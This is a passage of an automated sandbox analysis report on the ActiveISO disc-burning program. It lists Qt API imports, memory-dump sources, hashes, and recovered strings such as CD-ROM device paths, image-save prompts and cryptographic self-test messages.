                                                                                                                    • Part of subcall function 00007FF6537460F0: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF65374E9D0), ref: 00007FF653746215
                                                                                                                  • ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF65374EB54
                                                                                                                  • ??0QModelIndex@@QEAA@XZ.QT5CORE ref: 00007FF65374EB62
                                                                                                                  • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF65374EB98
                                                                                                                  • ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF65374EBA6
                                                                                                                  • ??0QModelIndex@@QEAA@XZ.QT5CORE ref: 00007FF65374EBB4
                                                                                                                  • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF65374EBED
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374EBF8
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374EC03
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374EC2C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Variant@@$String@@@$Model$Index@@$Char@@@$?from?tr@ArrayAscii_helper@Data@Object@@TypedV0@@$?arg@Array@@ByteChar@@ItemLatin1Model@@StandardV0@$$$?insertA@$$Index@@@Object@@@Row@Settings@@malloc
                                                                                                                  • String ID: Installed$Status$Version
                                                                                                                  • API String ID: 1459820816-318875045
                                                                                                                  • Opcode ID: 99e7af61cf137e0c99afcf1aa92c6343153181b00fe9b349fb12c45674f2329b
                                                                                                                  • Instruction ID: 7288fb152282f6da27f5068239c8492363826d847d9f96a0ee9257a8c83d8240
                                                                                                                  • Opcode Fuzzy Hash: 99e7af61cf137e0c99afcf1aa92c6343153181b00fe9b349fb12c45674f2329b
                                                                                                                  • Instruction Fuzzy Hash: 71B17E32B15A429AE7109FB1E8557EC2361FB85F89F455031DA0EB3AA8DF38D50CC784
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?fromArrayArray@Ascii_helper@CharCloseData@File@@HandleTypedmemset$Char@@@CreateFile$?arg@?remove@?replace@CaseChar@@DiskErrorFreeLastLatin1Qt@@@Sensitivity@SleepSpaceString@@@V1@0
                                                                                                                  • String ID: \\.\CdRom%1
                                                                                                                  • API String ID: 2461055693-3431200393
                                                                                                                  • Opcode ID: 30302d3639f7bae2ad4bc251ba6ea0d3505f656f7356ecd3ca883e13dd8fc37f
                                                                                                                  • Instruction ID: 22ddc202235c54ea54f4c3b8322342b7beae03f5dfc84f09d9e24e6f9048355d
                                                                                                                  • Opcode Fuzzy Hash: 30302d3639f7bae2ad4bc251ba6ea0d3505f656f7356ecd3ca883e13dd8fc37f
                                                                                                                  • Instruction Fuzzy Hash: 22B1D331F28A4296F710CB61E8462A97362FF85F95F580132EA4EB3AA4DF3CD549C744
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memmove$printf$memset$memcmp$__acrt_iob_func__stdio_common_vfprintf
                                                                                                                  • String ID: HMAC-SHA-%d test #%d: $ SHA-%d test #%d: $Hi There$VUUU$abc$failed$failed$passed$passed
                                                                                                                  • API String ID: 2423394248-3942491423
                                                                                                                  • Opcode ID: af10f6d85dcff605abc49acec3c5220c6daef1ac713ae3d38bdd3f5a82e6b66b
                                                                                                                  • Instruction ID: ed72c328df4b94c0b82d313f1cf3d34f864ac869eb2961bdf7d1368a0f59eb91
                                                                                                                  • Opcode Fuzzy Hash: af10f6d85dcff605abc49acec3c5220c6daef1ac713ae3d38bdd3f5a82e6b66b
                                                                                                                  • Instruction Fuzzy Hash: A012E262F3868256EB509B28D4663F96752FB40F94F885131D90EB7AC9EF3CE605C348
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: printf$memmovememset$__acrt_iob_func__stdio_common_vfprintf
                                                                                                                  • String ID: $ CTR_DRBG (PR = FALSE): $ CTR_DRBG (PR = TRUE) : $failed$failed$failed$failed$failed$failed$failed$failed$failed$passed$passed
                                                                                                                  • API String ID: 2222745066-3787344860
                                                                                                                  • Opcode ID: 9ffc107c9752bd06369e3c2c2924c321b41a41c838c96166779f0e563bc56015
                                                                                                                  • Instruction ID: e50eda2eebefd12aa5b12f8ce67bf185106875844637f0e79086818f377af508
                                                                                                                  • Opcode Fuzzy Hash: 9ffc107c9752bd06369e3c2c2924c321b41a41c838c96166779f0e563bc56015
                                                                                                                  • Instruction Fuzzy Hash: 0C126532E28BC299EB70CF25D8523E923A6FB45B48F884131D64EB6A59DF3CD654C704
                                                                                                                  APIs
                                                                                                                  • ?currentIndex@QTabWidget@@QEBAHXZ.QT5WIDGETS ref: 00007FF653724460
                                                                                                                  • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE ref: 00007FF6537244AF
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653724503
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65372451A
                                                                                                                  • ?question@QMessageBox@@SA?AW4StandardButton@1@PEAVQWidget@@AEBVQString@@1V?$QFlags@W4StandardButton@QMessageBox@@@@W421@@Z.QT5WIDGETS ref: 00007FF653724540
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65372454D
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653724556
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65372456D
                                                                                                                  • ?question@QMessageBox@@SA?AW4StandardButton@1@PEAVQWidget@@AEBVQString@@1V?$QFlags@W4StandardButton@QMessageBox@@@@W421@@Z.QT5WIDGETS ref: 00007FF653724593
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537245A0
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537245AC
                                                                                                                  • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE ref: 00007FF65372464A
                                                                                                                  • ?removeTab@QTabWidget@@QEAAXH@Z.QT5WIDGETS ref: 00007FF653724693
                                                                                                                  • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE ref: 00007FF6537246A4
                                                                                                                  • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE ref: 00007FF653724756
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537247B7
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537247C0
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF6537247D3
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF6537247E0
                                                                                                                  • ?count@QTabWidget@@QEBAHXZ.QT5WIDGETS ref: 00007FF653724845
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Array$String@@$Flags@Widget@@$?fromAscii_helper@Data@MessageStandardTyped$?allocate@AllocationData@@Data@@@@@Option@U1@_$?question@Array@@Box@@Box@@@@Button@Button@1@ByteString@@1V0@@W421@@$?count@?current?disconnect@?removeD01@Index@Object@@Tab@
                                                                                                                  • String ID: Do you want to save current image before closing?$Question$gfffffff
                                                                                                                  • API String ID: 1473962135-4096772189
                                                                                                                  • Opcode ID: 70c118869cbf61f7bc3895bc234439c4558c3cbd4c8aa00a657323fccc63bf6f
                                                                                                                  • Instruction ID: 9f90e59f9311ed8b5c77155dcdfb8b142dd9ce8a2ec06cd33c23e3217a1ad1dc
                                                                                                                  • Opcode Fuzzy Hash: 70c118869cbf61f7bc3895bc234439c4558c3cbd4c8aa00a657323fccc63bf6f
                                                                                                                  • Instruction Fuzzy Hash: 84C19532E28A8786EB10CB25E9826B83762FB44F54F484132DA1EB7B64DF3CE555C744
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Burn_Star$BurnerCdvdGrabber_$Disc$memset$ArrayInformationSpace$?allocate@AdvancedAllocationBlankData@@Data@@@@@FastFlags@FormatsFreeMediaOption@ReadSupportedTrackU1@_Used
                                                                                                                  • String ID: Blank
                                                                                                                  • API String ID: 4201631297-4260031329
                                                                                                                  • Opcode ID: 98437b3f67152a6853bba6d2b1ef546a06c15f017d96de01480442c572f90990
                                                                                                                  • Instruction ID: 30c6627167721c07676f2a1f94db8c32b132d04363a48f5640bbd50fc564766e
                                                                                                                  • Opcode Fuzzy Hash: 98437b3f67152a6853bba6d2b1ef546a06c15f017d96de01480442c572f90990
                                                                                                                  • Instruction Fuzzy Hash: ED02D532E246C185E724DF2094266FA27A2FBC5F88F188571EA0DAB75ADF3CD245C344
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Burn_Star$BurnerCdvdGrabber_$Disc$memset$ArrayInformationSpace$?allocate@AdvancedAllocationBlankData@@Data@@@@@FastFlags@FormatsFreeMediaOption@ReadSupportedTrackU1@_Used
                                                                                                                  • String ID: Blank
                                                                                                                  • API String ID: 4201631297-4260031329
                                                                                                                  • Opcode ID: 6bff7eb8bce67dedf7cb626603661fa8cc7b33f0de8f9cb21f7c48ce8fcadfd7
                                                                                                                  • Instruction ID: d3dc020cf67cc3bbf87da679098b003eebf571d7c401131b47aad112d349d57a
                                                                                                                  • Opcode Fuzzy Hash: 6bff7eb8bce67dedf7cb626603661fa8cc7b33f0de8f9cb21f7c48ce8fcadfd7
                                                                                                                  • Instruction Fuzzy Hash: A602D532E246C185E724DF2094266FA27A6FBC5F88F188571EA0DAB75ADF3CD245C344
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Burn_Star$BurnerCdvdGrabber_$Disc$memset$ArrayInformationSpace$?allocate@AdvancedAllocationBlankData@@Data@@@@@FastFlags@FormatsFreeMediaOption@ReadSupportedTrackU1@_Used
                                                                                                                  • String ID: Blank
                                                                                                                  • API String ID: 4201631297-4260031329
                                                                                                                  • Opcode ID: ced9e11b83dd3b857c27b1744fad3820a1c82417da1d983143c308eeb4ffd278
                                                                                                                  • Instruction ID: 4dd84c9f7997a1faf528644acfc65b1407f0d8b1c25fc7f08a3506ce3a8e3b42
                                                                                                                  • Opcode Fuzzy Hash: ced9e11b83dd3b857c27b1744fad3820a1c82417da1d983143c308eeb4ffd278
                                                                                                                  • Instruction Fuzzy Hash: DE02D432E246C185E724DF2094266FA27A6FBC5F88F188571EA0DAB75ADF3CD245C344
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Burn_Star$BurnerCdvdGrabber_$Disc$memset$ArrayInformationSpace$?allocate@AdvancedAllocationBlankData@@Data@@@@@FastFlags@FormatsFreeMediaOption@ReadSupportedTrackU1@_Used
                                                                                                                  • String ID: Blank
                                                                                                                  • API String ID: 4201631297-4260031329
                                                                                                                  • Opcode ID: 7def89e8fd18390007c5688ef803bca2bc1de53223db24aacb7004f54c4b2b92
                                                                                                                  • Instruction ID: 85abc2cffdae242d7b4244667dc164b0e1fc4c3f091a98857df1ed1d3424d5f2
                                                                                                                  • Opcode Fuzzy Hash: 7def89e8fd18390007c5688ef803bca2bc1de53223db24aacb7004f54c4b2b92
                                                                                                                  • Instruction Fuzzy Hash: B102D432E246C185E724DF2094266FA27A6FBC5F88F188571EA0DAB75ADF3CD245C344
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Burn_Star$BurnerCdvdGrabber_$Disc$memset$ArrayInformationSpace$?allocate@AdvancedAllocationBlankData@@Data@@@@@FastFlags@FormatsFreeMediaOption@ReadSupportedTrackU1@_Used
                                                                                                                  • String ID: Blank
                                                                                                                  • API String ID: 4201631297-4260031329
                                                                                                                  • Opcode ID: d4077a70c52dc1ba23cc7fe49da9a63538fb00f4497596d9a34bcffa3353c4d0
                                                                                                                  • Instruction ID: c3cbf15d9211633777ab1727207a2a6f456f0ccfca053b372aa5092d1c5e3524
                                                                                                                  • Opcode Fuzzy Hash: d4077a70c52dc1ba23cc7fe49da9a63538fb00f4497596d9a34bcffa3353c4d0
                                                                                                                  • Instruction Fuzzy Hash: 7C02D432E246C185E724DF2094266FA27A2FBC5F88F188571EA0DAB75ADF3CD245C344
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Burn_Star$BurnerCdvdGrabber_$Disc$memset$ArrayInformationSpace$?allocate@AdvancedAllocationBlankData@@Data@@@@@FastFlags@FormatsFreeMediaOption@ReadSupportedTrackU1@_Used
                                                                                                                  • String ID: Blank
                                                                                                                  • API String ID: 4201631297-4260031329
                                                                                                                  • Opcode ID: f6cee114cdd4e65c05cb297b454c07f7bc18a9725d00d7d552d31a36e451dde1
                                                                                                                  • Instruction ID: b07684bbf2345f6acd3e9606b8c7bf55757e79e0d2c768ddf5d085782ed76f41
                                                                                                                  • Opcode Fuzzy Hash: f6cee114cdd4e65c05cb297b454c07f7bc18a9725d00d7d552d31a36e451dde1
                                                                                                                  • Instruction Fuzzy Hash: C602D532E246C185E724DF2094266FA27A2FBC5F88F188571EA0DAB75ADF3CD245C344
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Burn_Star$BurnerCdvdGrabber_$Disc$memset$ArrayInformationSpace$?allocate@AdvancedAllocationBlankData@@Data@@@@@FastFlags@FormatsFreeMediaOption@ReadSupportedTrackU1@_Used
                                                                                                                  • String ID: Blank
                                                                                                                  • API String ID: 4201631297-4260031329
                                                                                                                  • Opcode ID: 377cac9dba98f76b15daed47e3fe6f40b9606093ef8b15dfb10db3af9ce44824
                                                                                                                  • Instruction ID: e32d181b68d6c212d829369d14b1c947a93658cbea15e75d2ff25dfc008c73be
                                                                                                                  • Opcode Fuzzy Hash: 377cac9dba98f76b15daed47e3fe6f40b9606093ef8b15dfb10db3af9ce44824
                                                                                                                  • Instruction Fuzzy Hash: 8202D432E246C185E724DF2094266FA27A6FBC5F88F188571EA0DAB75ADF3CD245C344
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
